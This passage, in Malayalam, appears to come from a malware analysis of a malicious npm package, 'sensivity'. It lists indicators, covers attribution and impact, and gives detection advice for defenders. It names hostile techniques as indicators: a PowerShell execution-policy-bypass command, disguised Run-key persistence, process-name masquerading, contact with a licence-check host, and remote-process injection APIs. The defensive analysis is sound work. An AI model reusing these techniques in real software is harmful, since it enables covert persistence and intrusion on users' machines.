| ബിഹേവിയറൽ | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | ജനറേറ്റ് ചെയ്ത പവർഷെൽ സ്ക്രിപ്റ്റുകൾക്ക് എക്സിക്യൂഷൻ-പോളിസി ബൈപാസ് ഉപയോഗിക്കുന്നു. |
| ബിഹേവിയറൽ | UIAutomation ValuePattern ബ്രൗസർ വിലാസ ബാർ വായിക്കുക | ഫോർഗ്രൗണ്ട് ബ്രൗസർ വിൻഡോയുടെ URL വായിക്കുന്നു. |
| ബിഹേവിയറൽ | ടാർഗെറ്റ് വീഡിയോ ഐഡി wJWta2lO0Lw; 3-സെക്കൻഡ് YouTube പോൾ | പിൻ ചെയ്ത ഇടപെടൽ-നിരീക്ഷണ സിഗ്നൽ. |
| നെറ്റ്വർക്ക് | http://localhost:3000, ആശ്രയിക്കുക http://192.168.1.16:3000 | QR-ജോടിയാക്കൽ നിയന്ത്രണ പാനൽ പ്രാദേശികമായും LAN-ലും തുറന്നിരിക്കുന്നു. |
| പരിസ്ഥിതി | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | വേർപെടുത്തിയ വാച്ച്ഡോഗ് പ്രക്രിയ ഏകോപന പതാകകൾ. |
ആട്രിബ്യൂഷൻ, ഇംപാക്റ്റ്, ഡിഫൻഡർമാർ
ഈ പാക്കേജ് പ്രസിദ്ധീകരിച്ചിരിക്കുന്നത് ഒരൊറ്റ npm അക്കൗണ്ടാണ്, അതിന്റെ ഇമെയിൽ സ്ഥിരീകരിക്കാത്ത Gmail വിലാസമാണ്. അക്കൗണ്ടിന് വളരെ നെഗറ്റീവ് രജിസ്ട്രി റെപ്യൂട്ടേഷൻ സ്കോർ ഉണ്ട്, ഈ ഒരു പാക്കേജ് മാത്രമേ പരിപാലിക്കുകയും പ്രസിദ്ധീകരിക്കുകയും ചെയ്യുന്നുള്ളൂ, കൂടാതെ ലിങ്ക് ചെയ്ത ഉറവിട ശേഖരണവുമില്ല. ഇമെയിലിന്റെ ഉടമസ്ഥാവകാശം ഞങ്ങൾ പരിശോധിച്ചിട്ടില്ല, കൂടാതെ പേരുള്ള ഒരു വ്യക്തിക്കും അല്ല, പ്രസാധക അക്കൗണ്ടിലേക്കാണ് ഞങ്ങൾ കാമ്പെയ്ൻ ആട്രിബ്യൂട്ട് ചെയ്യുന്നത്. ലോഞ്ചറിൽ ക്ലിയർടെക്സ്റ്റ് ഇൻഫ്രാസ്ട്രക്ചർ ഇല്ല, പക്ഷേ ഒരു ബാഹ്യ ഹോസ്റ്റ് ഇപ്പോൾ അറിയപ്പെടുന്നു: അവ്യക്തമായ സെർവർ ലൈസൻസ് പരിശോധനയ്ക്കായി izopi.com-നെ ബന്ധപ്പെടുന്നു, കൂടാതെ നേറ്റീവ് മൊഡ്യൂൾ - അതിന്റെ ഇറക്കുമതി പട്ടികയിലും സ്ട്രിംഗുകളിലും നിന്ന് റിവേഴ്സ്ഡ് ഇൻസ്ട്രക്ഷൻ-ബൈ-ഇൻസ്ട്രക്ഷൻ അല്ല - മറ്റൊരു പ്രക്രിയയുടെ മെമ്മറിയിലേക്ക് കുത്തിവയ്ക്കുകയും വായിക്കുകയും ചെയ്യുന്ന ഒരു ഗെയിം ഓവർലേയാണ്.
കൺട്രോൾ പാനൽ യൂട്ടിലിറ്റി പ്രതീക്ഷിച്ച് സെൻസിറ്റിവിറ്റി ഇൻസ്റ്റാൾ ചെയ്ത് പ്രവർത്തിപ്പിക്കുന്ന വിൻഡോസ് ഉപയോക്താക്കളിലാണ് ഇതിന്റെ ദൃശ്യമായ ആഘാതം. ആ ഹോസ്റ്റുകളിൽ പാക്കേജ് ഒരു വൺഡ്രൈവ് ടാസ്ക് ആയി വേഷംമാറി ഓട്ടോസ്റ്റാർട്ട് പെർസിസ്റ്റൻസ് സ്ഥാപിക്കുന്നു, ഒരു സിസ്റ്റം പ്രോസസ്സിനെ അനുകരിക്കാൻ സ്വയം പുനർനാമകരണം ചെയ്യുന്നു, ഉപയോക്താവ് ബ്രൗസ് ചെയ്യുന്നതിന്റെ URL വായിക്കുന്നു, കൂടാതെ ലോക്കൽ നെറ്റ്വർക്കിലൂടെ മെഷീനെ ഒരു റിമോട്ടിലേക്ക് ബന്ധിപ്പിക്കുന്ന ഒരു പെയറിംഗ് പാനൽ സ്ഥാപിക്കുന്നു. സൂപ്പർവൈസർ/വർക്കർ വാച്ച്ഡോഗ് എന്നാൽ ഒരൊറ്റ പ്രോസസ്സ് കിൽ അത് നീക്കം ചെയ്യുന്നില്ല എന്നാണ്; റൺ-കീ എൻട്രി റീബൂട്ടുകളെ അതിജീവിക്കുന്നു. macOS, Linux എന്നിവ ലോഞ്ചർ ലക്ഷ്യമിടുന്നില്ല - പെർസിസ്റ്റൻസ്, പവർഷെൽ, UIAutomation പാത്തുകൾ വിൻഡോസിൽ മാത്രമുള്ളതാണ്.
എഴുപത് പതിപ്പുകളുടെ മാറ്റം എടുത്തുപറയേണ്ട ഒരു പ്രവണതയാണ്. ഏതാനും ദിവസങ്ങൾക്കുള്ളിൽ ഒരു പാക്കേജ് ഡസൻ കണക്കിന് തവണ പുനഃപ്രസിദ്ധീകരിക്കുന്നത്, ഇതിനകം നീക്കം ചെയ്തതിന് താഴെയുള്ള പതിപ്പ് നമ്പറുകൾ ബാക്ക്-ഫിൽ ചെയ്യുന്നത് ഉൾപ്പെടെ, നീക്കം ചെയ്യലുകൾക്കിടയിൽ രജിസ്ട്രിയിൽ ഒരു തത്സമയ പകർപ്പ് നിലനിർത്തുകയും പതിപ്പ്-പിൻ ചെയ്ത ബ്ലോക്ക്ലിസ്റ്റുകളെ നിരാശപ്പെടുത്തുകയും ചെയ്യുന്നു. sensivity@2.5.61 എന്നതിനായുള്ള ബ്ലോക്ക്ലിസ്റ്റ് എൻട്രി അടുത്ത ദിവസം പുനഃപ്രസിദ്ധീകരിക്കുന്ന sensivity@2.5.3 ന് എതിരായി ഒന്നും ചെയ്യുന്നില്ല.
പ്രതിരോധക്കാർക്ക് ഇനിപ്പറയുന്നവയിൽ പ്രവർത്തിക്കാൻ കഴിയും:
- രജിസ്ട്രി-പ്രോക്സി, CI അനുമതി ലിസ്റ്റുകളിൽ പാക്കേജ് നാമ സംവേദനക്ഷമത പൂർണ്ണമായും തടയുക. വ്യക്തിഗത പതിപ്പുകൾ പിൻ ചെയ്യുന്നത് പുനഃപ്രസിദ്ധീകരണ കേഡൻസിന് നഷ്ടമാകും; പേര് ഈടുനിൽക്കുന്ന സൂചകമാണ്.
- ഓരോ ഉപയോക്താവിനും ഒരു .vbs പാത്തിൽ wscript.exe നെ അഭ്യർത്ഥിക്കുന്ന OneDriveUpdate എന്ന റൺ മൂല്യം തിരയുക. യഥാർത്ഥ OneDrive അപ്ഡേറ്റർ ഈ രീതിയിൽ രജിസ്റ്റർ ചെയ്തിട്ടില്ല.
- Runtime Broker എന്ന process.title ഉള്ള ഒരു Node.js പ്രോസസ്സിനെക്കുറിച്ചുള്ള മുന്നറിയിപ്പ്. യഥാർത്ഥ ബ്രോക്കർ RuntimeBroker.exe ആണ്, Node runtime അല്ല.
- ഒരു കംപൈൽ ചെയ്ത .node ആഡ്ഓണും ഒരു സഹോദര .obf.js ഫയലിന്റെ eval(fs.readFileSync(…)) ഉം അയയ്ക്കുന്ന പാക്കേജുകളുടെ ഫ്ലാഗ് npm ഇൻസ്റ്റാളേഷൻ സമയത്തെ കണ്ടെത്തലുകൾ. ആ ജോടിയാക്കൽ - ഒരു അവ്യക്തമായ ടെക്സ്റ്റ് പേലോഡിന് അടുത്തായി ലോഡ് ചെയ്ത അതാര്യമായ നേറ്റീവ് ബൈനറി - ഇവിടെ ഘടനാപരമായ വിവരമാണ്, ഏതെങ്കിലും സ്ട്രിംഗ് IOC-യിൽ നിന്ന് സ്വതന്ത്രമാണ്.
- മാനേജ്ഡ് വിൻഡോസ് എൻഡ്പോയിന്റുകളിൽ, അപ്രതീക്ഷിതമായ ഒരു നോഡ് പ്രോസസ്സ് വഴി സൃഷ്ടിക്കപ്പെടുന്ന പോർട്ട് 3000-ലെ ഏതൊരു ലോക്കൽ-ബൗണ്ട് ലിസണറെയും സംശയാസ്പദമായി കണക്കാക്കുക.
- ഡെവലപ്പറിൽ നിന്നോ അന്തിമ ഉപയോക്തൃ ഹോസ്റ്റുകളിൽ നിന്നോ izopi.com ലേക്കുള്ള ഔട്ട്ബൗണ്ട് അഭ്യർത്ഥനകളിൽ തടയുകയോ മുന്നറിയിപ്പ് നൽകുകയോ ചെയ്യുക; അവ്യക്തമായ സെർവറിൽ നിന്ന് /check.php-ൽ എത്തിച്ചേരുന്ന പാക്കേജിന്റെ ഏക ബാഹ്യ എൻഡ്പോയിന്റാണിത്.
- ബണ്ടിൽ ചെയ്ത ഏതൊരു .node ആഡോണിനും, അതിനെ വിശ്വസിക്കുന്നതിന് മുമ്പ് അതിന്റെ ഇറക്കുമതി പട്ടിക പരിശോധിക്കുക. പാക്കേജ് എന്ത് അവകാശപ്പെടുന്നു എന്നത് പരിഗണിക്കാതെ തന്നെ OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread എന്ന കോമ്പിനേഷൻ റിമോട്ട്-പ്രോസസ് ഇഞ്ചക്ഷൻ ആണ്; ഇവിടെ അത് ഒരു Direct3D ഓവർലേയ്ക്കും aimbot/ESP/triggerbot സ്ട്രിംഗുകൾക്കും അടുത്തായി സ്ഥിതിചെയ്യുന്നു.
സ്റ്റാറ്റിക് വിശകലനത്തിനായി pipelines, പതിപ്പ് ചർണിലുടനീളം കൺവിക്ഷൻ ഷേപ്പ് നിലനിൽക്കുന്നു: ഒരു നോൺ-നെറ്റ്വർക്ക് ഇൻസ്റ്റാൾ പ്രൊഫൈൽ, അറിയപ്പെടുന്ന ഒരു സിസ്റ്റം-പ്രോസസ് നാമത്തിലേക്കുള്ള ഒരു പ്രോസസ്സ്-ടൈറ്റിൽ അസൈൻമെന്റ്, പവർഷെൽ വഴി ഒരു റൺ-കീ റൈറ്റ്, ഡിസ്കിൽ നിന്ന് വായിച്ച ഒരു ഫയലിന്റെ വിലയിരുത്തൽ. അവയൊന്നും ഒരു ഡൊമെയ്ൻ, ഒരു IP അല്ലെങ്കിൽ അടുത്ത പുനഃപ്രസിദ്ധീകരണത്തിന് മാറ്റാൻ കഴിയുന്ന ഒരു പതിപ്പ് നമ്പറിനെ ആശ്രയിക്കുന്നില്ല.
അവലംബം
[npm: സെൻസിറ്റിവിറ്റി] – ഇവിടെ ചർച്ച ചെയ്ത പാക്കേജ് പതിപ്പ് ലൈനിനായുള്ള രജിസ്ട്രി പേജ്; നീക്കം ചെയ്യലിന് വിധേയമാണ്.





